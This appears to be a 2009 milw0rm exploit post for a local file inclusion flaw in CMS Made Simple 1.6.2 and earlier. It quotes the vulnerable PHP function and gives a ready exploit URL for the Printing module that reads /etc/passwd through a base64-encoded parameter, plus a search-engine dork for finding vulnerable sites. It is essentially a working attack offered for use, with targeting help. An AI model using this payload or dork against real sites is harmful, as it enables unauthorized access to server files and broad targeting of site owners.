31 lines
No EOL
1 KiB
Text
31 lines
No EOL
1 KiB
Text
#########################################################################################
|
|
#
|
|
# [CMS Made Simple <= 1.6.2]
|
|
#
|
|
# Class: LFI
|
|
# Reported: 29/07/2009
|
|
# Public release: 10/08/2009
|
|
# Remote: Yes
|
|
# DORK: "This site is powered by CMS Made Simple version 1."
|
|
# Site: http://www.cmsmadesimple.org/
|
|
# Download: http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
|
|
##########################################################################################
|
|
|
|
Vulnerability:
|
|
============================================
|
|
function GetURLContent($url) {
|
|
$content=file_get_contents($url);
|
|
return $content;
|
|
}
|
|
=============================================
|
|
|
|
Exploit :
|
|
================================================================================
|
|
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
|
|
================================================================================
|
|
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64
|
|
|
|
|
|
#ihteam.net - Inclusion Hunter Team
|
|
|
|
# milw0rm.com [2009-08-10] |